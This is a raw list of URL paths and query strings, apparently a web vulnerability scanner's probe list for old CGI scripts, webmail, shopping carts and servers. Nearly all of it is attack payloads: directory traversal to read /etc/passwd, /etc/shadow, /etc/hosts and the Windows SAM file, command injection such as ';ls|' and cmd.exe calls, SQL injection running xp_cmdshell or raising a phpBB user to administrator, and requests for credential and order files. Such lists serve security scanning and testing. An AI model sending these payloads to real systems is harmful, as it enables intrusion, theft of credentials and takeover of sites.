/cgi-bin/nph-maillist.pl /content.pl?group=49&id=140%20or%20id>0%20or%20ls_id<1000 /cgi-bin/processit.pl /quote.html?filename=../../../../../../../../../../../../../../../../etc/hosts&path_to_font_file=ariali.ttf :6346/........../windows/win.ini /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/hosts%00 /cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/hosts /cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/hosts /cgi-bin/a1stats/a1disp.cgi?|/bin/ls| /%2e%2e/%2e%2e/%2e%2e/scandisk.log /../scandisk.log /scripts/Carello/Carello.dll?CARELLOCODE=SITE2&VBEXE=C:\..\winnt\system32\cmd.exe%20/c%20echo%20test>c:\defcom.txt /cgi-bin/sgdynamo.exe?HTNAME=default.htm /pass?loginpass=a&redirect=0%2F&Submit=Login /.../.../scandisk.log /..../scandisk.log /chip.ini /ChipCfg.cfg /ChipCfg /cgi-bin/viewsrc.cgi?loc=../../../../../../../../etc/hosts /cgi-bin/directorypro.cgi?want=showcat&show=../../../..//etc/hosts%00 :9090//etc/shadow /interscan/cgi-bin/FtpSave.dll?no /interscan/cgi-bin/FtpSave.dll?yes /interscan/cgi-bin/FtpSave.dll?I'm%20here /cgi-bin/CatalogMgr.pl?cartID=366&template=CatalogMgr.pl /admin/?op=%c0 :631/admin/?op=%c0 /cgi-bin/ws_mail.cgi?kill=ng :8000/file/%2E%2E/test1.mp3 /basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=blah&password=blah /base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/hosts&id=1 :444/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/hosts&id=1 /cgi-bin/DCShop/Orders/orders.txt /cgi-bin/DCShop/Auth_data/auth_user_file.txt :30001/SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/hosts /SWEditServlet?station_path=Z&publication_id=2043&template=../../../../../../../etc/hosts :30001/../../template/shared/indexTemplate.xml /../../template/shared/indexTemplate.xml /servlet/com.unify.ewave.servletexec.UploadServlet /imp/compose.php /compose.php /AdLogin.pm /adcycle/AdLogin.pm /cgi-bin/story.cgi?next= /webmacro/Page?db=tst&wmtemplate=ttt /webmacro/org.paneris.paneris.controller.Page?db=tst&wmtemplate=ttt /mailman/edithtml /cgi-bin/uncgi /sbin/nscgi.cfg /administrator/index2.php?PHPSESSID=1&myname=admin&fullname=admin&userid=administrator /session/pagecount?page= /sek-bin/login.gas.bat :8080/../ssd.ini /scripts/wsendmail.exe /cgi-bin/wsendmail.exe /scripts/toos/mkilog.exe /scripts/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=ngt(ng%20int);EXEC+master..xp_cmdshell("cmd.exe+/c%20dir");-- /cgi-bin/sdbsearch.cgi?stichwort=keyword /phpBBfolder/prefs.php?save=1&viewemail=1',user_level%3D'4'%20where%20username%3D'hoschi'%23 /cgi-bin/mail.cgi /scripts/mail.cgi /cgi-bin/mailform.exe /scripts/mailform.exe /cgi-bin/mailsend.exe /scripts/mailsend.exe /cgi-bin/mailme.exe /scripts/mailme.exe /cgi-bin/mailmepro.exe /scripts/mailmepro.exe /cgi-bin/MailPost.exe /scripts/MailPost.exe /cgi-bin/postie.exe /cgi-bin/postie.cgi /scripts/postie.exe /scripts/postie.cgi /cgi-bin/formvar.exe /scripts/formvar.exe /cgi-bin/blat.exe /scripts/blat.exe /cgi-bin/cgimail.exe /scripts/cgimail.exe /cgi-bin/webboard/generate.cgi?content=../../../../../../../../../etc/hosts%00&board=tst /c/s.dll/ncbook/book.cgi?action=default¤t=|ls|&form_tid=996604045&prev=main.html&list_message_index=10 :4096/../../../winnt/repair/sam._ /4DBin/_/C:/winnt/repair/sam._ /4DBin/_/../winnt/repair/sam._ /4DBin/_/C:/inetpub/../boot.ini /4DBin/_/../boot.ini /4DBin/_/../inetpub/../boot.ini /ext.dll%00 /cgiWebupdate.exe /index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc /basilix/basilix.php3?username=blah;ls /basilix/basilix.php?username=blah;ls /quickstart/util/srcview.aspx?path=./&file=srcview.aspx&font=3 /web.config /edit_image.php?dn=1&userfile=/etc/hosts&userfile_name=%20;ls;%20 /scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;ls| /cgi-local/shop.pl/SID=947626980.19094/page=;ls| /cgi-shop/view_item?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999 /cgi-shop/view_item.pl?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999 /cgi-bin/powerup/r.cgi?FILE=main.html /cgi-bin/powerup/r.pl?FILE=main.html /cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls| /cgi-bin/eshop.pl?seite=;ls| /admin.php?upload=1&file=config.php&file_name=tmp.txt&wdir=/images/&userfile=config.php&userfile_name=tmp.txt /images/tmp.txt /cgi-bin/html_page?TEMPLATE=main